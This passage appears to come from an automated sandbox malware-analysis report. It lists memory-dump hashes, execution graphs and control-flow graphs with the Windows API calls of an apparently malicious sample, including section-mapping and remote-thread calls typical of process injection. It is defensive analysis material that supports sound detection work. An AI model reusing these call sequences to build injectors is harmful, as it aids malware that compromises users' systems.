                                                                                                                                • Instruction ID: 9d4361ea33130ba830f8d28f67da7d1aa15ef5b4c3ec77d01604af3b42cbb980
                                                                                                                                • Opcode Fuzzy Hash: 4942408b6b913c629bf7ab27e75949e04648a7700be6f97819f5e5167400597e
                                                                                                                                • Instruction Fuzzy Hash: 73E15522B1FBCA0FEB6A976818756B57FD1EF5A614B0A01FFD099C70E3E91868058341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1937195965.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b890000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 35bf43716b0141ce597350351f4294d2d92b0f488ca8ba4324ed9d76b2f6da83
                                                                                                                                • Instruction ID: a543df5ce06b0cab8e8de2132bff1f1e352679379c77f46d004192be569011ae
                                                                                                                                • Opcode Fuzzy Hash: 35bf43716b0141ce597350351f4294d2d92b0f488ca8ba4324ed9d76b2f6da83
                                                                                                                                • Instruction Fuzzy Hash: 43210A22F2FA8E4FFBB4976814711B87AC2DF59718B4A00BAD05DC71E3DD19AC414341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1936597676.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7ffd9b7c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                • Instruction ID: 995c809a1818668ffa22beee52c015c350a696e0f72191c51961a08a26fb3fe4
                                                                                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                • Instruction Fuzzy Hash: 7701A73020CB0C4FD748EF0CE051AB5B3E0FB85320F10066DE58AC36A1DA32E882CB41

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:8.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                                Signature Coverage:49.4%
                                                                                                                                Total number of Nodes:156
                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                execution_graph 4265 6a092b GetPEB 4266 6a0972 4265->4266 4171 402e42 4174 402e47 4171->4174 4172 402f18 4173 401902 8 API calls 4172->4173 4176 402f4c 4172->4176 4173->4176 4174->4172 4175 4020ea NtQuerySystemInformation 4174->4175 4174->4176 4175->4172 4330 418986 4331 418990 4330->4331 4332 418940 SetPriorityClass 4331->4332 4333 4189ad 4331->4333 4332->4331 4279 40190e 4280 401912 4279->4280 4281 4018b5 4279->4281 4282 401946 Sleep 4280->4282 4283 401961 4282->4283 4284 401529 7 API calls 4283->4284 4285 401972 4283->4285 4284->4285 4044 418ed0 4047 418a70 4044->4047 4046 418ed5 4048 418a7d 4047->4048 4049 418b80 7 API calls 4048->4049 4050 418cc6 4048->4050 4052 418bf8 7 API calls 4049->4052 4051 418cd4 SetCommState 4050->4051 4055 418ced 4050->4055 4051->4050 4053 418ca4 4052->4053 4054 418c98 ObjectPrivilegeAuditAlarmW 4052->4054 4056 418cb5 4053->4056 4057 418cad WaitForSingleObject 4053->4057 4054->4053 4058 418daa 4055->4058 4059 418cfa 9 API calls 4055->4059 4056->4050 4057->4056 4071 418740 LocalAlloc 4058->4071 4066 418d88 4059->4066 4063 418daf LoadLibraryA 4072 418770 GetModuleHandleW GetProcAddress VirtualProtect 4063->4072 4064 418dfd 4073 4189d0 4064->4073 4066->4058 4067 418e02 4068 418e43 InterlockedCompareExchange 4067->4068 4069 418e23 MoveFileW 4067->4069 4070 418e5d 4067->4070 4068->4067 4069->4067 4070->4046 4071->4063 4072->4064 4074 4189f9 QueryDosDeviceW 4073->4074 4075 418a0a 4073->4075 4074->4075 4084 418910 4075->4084 4078 418a25 4087 418950 4078->4087 4079 418a1d FreeEnvironmentStringsA 4079->4078 4082 418a57 4082->4067 4083 418a3c HeapCreate GetNumaProcessorNode 4083->4082 4085 418921 FatalAppExitA GetModuleHandleA 4084->4085 4086 418933 4084->4086 4085->4086 4086->4078 4086->4079 4088 41896c 4087->4088 4089 41895e BuildCommDCBA 4087->4089 4090 418974 FreeEnvironmentStringsA 4088->4090 4093 41897c 4088->4093 4089->4093 4090->4093 4091 4189ad 4091->4082 4091->4083 4093->4091 4094 418940 4093->4094 4097 4188c0 4094->4097 4098 4188eb 4097->4098 4099 4188dc SetPriorityClass 4097->4099 4098->4093 4099->4098 4100 6a003c 4101 6a0049 4100->4101 4113 6a0e0f SetErrorMode SetErrorMode 4101->4113 4106 6a0265 4107 6a02ce VirtualProtect 4106->4107 4109 6a030b 4107->4109 4108 6a0439 VirtualFree 4112 6a04be LoadLibraryA 4108->4112 4109->4108 4111 6a08c7 4112->4111 4114 6a0223 4113->4114 4115 6a0d90 4114->4115 4116 6a0dad 4115->4116 4117 6a0dbb GetPEB 4116->4117 4118 6a0238 VirtualAlloc 4116->4118 4117->4118 4118->4106 4183 4014db 4184 40148f 4183->4184 4192 401469 4183->4192 4184->4183 4185 4015d5 NtDuplicateObject 4184->4185 4184->4192 4186 4015f2 NtCreateSection 4185->4186 4185->4192 4187 401672 NtCreateSection 4186->4187 4188 401618 NtMapViewOfSection 4186->4188 4189 40169e 4187->4189 4187->4192 4188->4187 4190 40163b NtMapViewOfSection 4188->4190 4191 4016a8 NtMapViewOfSection 4189->4191 4189->4192 4190->4187 4193 401659 4190->4193 4191->4192 4194 4016cf NtMapViewOfSection 4191->4194 4193->4187 4194->4192 4290 401922 4291 401930 4290->4291 4292 401946 Sleep 4291->4292 4293 401961 4292->4293 4294 401529 7 API calls 4293->4294 4295 401972 4293->4295 4294->4295 4312 401534 4313 401546 4312->4313 4314 4015d5 NtDuplicateObject 4313->4314 4321 4016f1 4313->4321 4315 4015f2 NtCreateSection 4314->4315 4314->4321 4316 401672 NtCreateSection 4315->4316 4317 401618 NtMapViewOfSection 4315->4317 4318 40169e 4316->4318 4316->4321 4317->4316 4319 40163b NtMapViewOfSection 4317->4319 4320 4016a8 NtMapViewOfSection 4318->4320 4318->4321 4319->4316 4322 401659 4319->4322 4320->4321 4323 4016cf NtMapViewOfSection 4320->4323 4322->4316 4323->4321 4119 790c8e 4120 790c92 4119->4120 4122 790c9e 4119->4122 4123 790c9f 4120->4123 4124 790cae 4123->4124 4127 79143f 4124->4127 4128 79145a 4127->4128 4129 791463 CreateToolhelp32Snapshot 4128->4129 4130 79147f Module32First 4128->4130 4129->4128 4129->4130 4131 79148e 4130->4131 4132 790cb7 4130->4132 4134 7910fe 4131->4134 4132->4122 4135 791129 4134->4135 4136 79113a VirtualAlloc 4135->4136 4137 791172 4135->4137 4136->4137 4138 402ffa 4139 403024 4138->4139 4140 40313d 4138->4140 4139->4140 4141 4030df RtlCreateUserThread NtTerminateProcess 4139->4141 4141->4140 4142 402ebc 4145 402eb4 4142->4145 4143 402f18 4147 402f4c 4143->4147 4153 401902 4143->4153 4145->4143 4145->4147 4148 4020ea 4145->4148 4149 4020fb 4148->4149 4150 40214e 4149->4150 4151 402152 NtQuerySystemInformation 4149->4151 4152 40216e 4149->4152 4150->4149 4150->4151 4151->4150 4152->4143 4154 401913 4153->4154 4155 401946 Sleep 4154->4155 4156 401961 4155->4156 4158 401972 4156->4158 4159 401529 4156->4159 4158->4147 4160 401539 4159->4160 4161 4015d5 NtDuplicateObject 4160->4161 4168 4016f1 4160->4168 4162 4015f2 NtCreateSection 4161->4162 4161->4168 4163 401672 NtCreateSection 4162->4163 4164 401618 NtMapViewOfSection 4162->4164 4165 40169e 4163->4165 4163->4168 4164->4163 4166 40163b NtMapViewOfSection 4164->4166 4167 4016a8 NtMapViewOfSection 4165->4167 4165->4168 4166->4163 4169 401659 4166->4169 4167->4168 4170 4016cf NtMapViewOfSection 4167->4170 4168->4158 4169->4163 4170->4168 4195 4020fc 4196 402107 4195->4196 4197 402152 NtQuerySystemInformation 4196->4197 4198 40216e 4196->4198 4197->4196

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 24 418ce4-418ceb 19->24 25 418ced-418cf4 19->25 26 418cb5-418cc3 22->26 27 418cad-418caf WaitForSingleObject 22->27 23->22 24->19 24->25 28 418daa-418db9 call 418740 25->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 34 418dbb-418dcc 28->34 35 418ded-418df8 LoadLibraryA call 418770 28->35 29->28 37 418dd0-418de0 34->37 42 418dfd-418e0e call 4189d0 35->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->35 41->37 46 418e10-418e17 42->46 48 418e19-418e27 MoveFileW 46->48 49 418e2d-418e33 46->49 48->49 50 418e35 call 418760 49->50 51 418e3a-418e41 49->51 50->51 54 418e43-418e4e InterlockedCompareExchange 51->54 55 418e54-418e5b 51->55 54->55 55->46 57 418e5d-418e6d 55->57 59 418e70-418e80 57->59 60 418e82 59->60 61 418e89-418e8c 59->61 60->61 61->59 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                                                APIs
                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                                • GetFocus.USER32 ref: 00418B91
                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                                • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                                • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                                • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                                • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                                • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                                • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                                • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                                • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                                • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                                • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                                • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                                • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994456537.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                                • String ID: k`$}$
                                                                                                                                • API String ID: 2220722107-956986773
                                                                                                                                • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                                • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                                • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                                • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 80 40149a-4014a8 75->80 81 4014fd-4014ff 75->81 84 40156e-40157f 77->84 85 4014c1-4014c8 80->85 83 401501 81->83 81->84 88 401504-401518 83->88 89 40148f 83->89 86 401581 84->86 87 401584-401589 84->87 90 401469-401485 call 4011a4 85->90 91 4014ca 85->91 86->87 97 4018a6-4018ae 87->97 98 40158f-4015a0 87->98 88->85 92 40151a 88->92 89->80 90->69 91->68 94 401539-401555 92->94 95 40151c-401526 92->95 94->71 97->87 106 4018a4-4018b3 98->106 107 4015a6-4015cf 98->107 110 4018c8 106->110 111 4018b9-4018c4 106->111 107->106 116 4015d5-4015ec NtDuplicateObject 107->116 110->111 112 4018cb-4018ff call 4011a4 110->112 111->112 116->106 118 4015f2-401616 NtCreateSection 116->118 120 401672-401698 NtCreateSection 118->120 121 401618-401639 NtMapViewOfSection 118->121 120->106 122 40169e-4016a2 120->122 121->120 124 40163b-401657 NtMapViewOfSection 121->124 122->106 125 4016a8-4016c9 NtMapViewOfSection 122->125 124->120 127 401659-40166f 124->127 125->106 128 4016cf-4016eb NtMapViewOfSection 125->128 127->120 128->106 130 4016f1 call 4016f6 128->130
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                                                                • String ID: 1
                                                                                                                                • API String ID: 1652636561-2212294583
                                                                                                                                • Opcode ID: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                                • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                                • Opcode Fuzzy Hash: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                                • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 243 4018c8 239->243 244 4018b9-4018c4 239->244 240->239 249 4015d5-4015ec NtDuplicateObject 240->249 243->244 245 4018cb-4018ff call 4011a4 243->245 244->245 249->239 251 4015f2-401616 NtCreateSection 249->251 253 401672-401698 NtCreateSection 251->253 254 401618-401639 NtMapViewOfSection 251->254 253->239 255 40169e-4016a2 253->255 254->253 257 40163b-401657 NtMapViewOfSection 254->257 255->239 258 4016a8-4016c9 NtMapViewOfSection 255->258 257->253 260 401659-40166f 257->260 258->239 261 4016cf-4016eb NtMapViewOfSection 258->261 260->253 261->239 263 4016f1 call 4016f6 261->263
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                                • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                                • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                                • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 289 4018c8 285->289 290 4018b9-4018c4 285->290 286->285 295 4015d5-4015ec NtDuplicateObject 286->295 289->290 291 4018cb-4018ff call 4011a4 289->291 290->291 295->285 297 4015f2-401616 NtCreateSection 295->297 299 401672-401698 NtCreateSection 297->299 300 401618-401639 NtMapViewOfSection 297->300 299->285 301 40169e-4016a2 299->301 300->299 303 40163b-401657 NtMapViewOfSection 300->303 301->285 304 4016a8-4016c9 NtMapViewOfSection 301->304 303->299 306 401659-40166f 303->306 304->285 307 4016cf-4016eb NtMapViewOfSection 304->307 306->299 307->285 309 4016f1 call 4016f6 307->309
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                                • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                                                                                                                                • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                                                                                                                                • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 337 4018c8 333->337 338 4018b9-4018c4 333->338 334->333 343 4015d5-4015ec NtDuplicateObject 334->343 337->338 339 4018cb-4018ff call 4011a4 337->339 338->339 343->333 345 4015f2-401616 NtCreateSection 343->345 347 401672-401698 NtCreateSection 345->347 348 401618-401639 NtMapViewOfSection 345->348 347->333 349 40169e-4016a2 347->349 348->347 351 40163b-401657 NtMapViewOfSection 348->351 349->333 352 4016a8-4016c9 NtMapViewOfSection 349->352 351->347 354 401659-40166f 351->354 352->333 355 4016cf-4016eb NtMapViewOfSection 352->355 354->347 355->333 357 4016f1 call 4016f6 355->357
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                                • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                                • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                                • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 380 4018c8 376->380 381 4018b9-4018c4 376->381 377->376 386 4015d5-4015ec NtDuplicateObject 377->386 380->381 382 4018cb-4018ff call 4011a4 380->382 381->382 386->376 388 4015f2-401616 NtCreateSection 386->388 390 401672-401698 NtCreateSection 388->390 391 401618-401639 NtMapViewOfSection 388->391 390->376 392 40169e-4016a2 390->392 391->390 394 40163b-401657 NtMapViewOfSection 391->394 392->376 395 4016a8-4016c9 NtMapViewOfSection 392->395 394->390 397 401659-40166f 394->397 395->376 398 4016cf-4016eb NtMapViewOfSection 395->398 397->390 398->376 400 4016f1 call 4016f6 398->400
                                                                                                                                APIs
                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                                • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                                                                                                                                • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                                                                                                                                • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
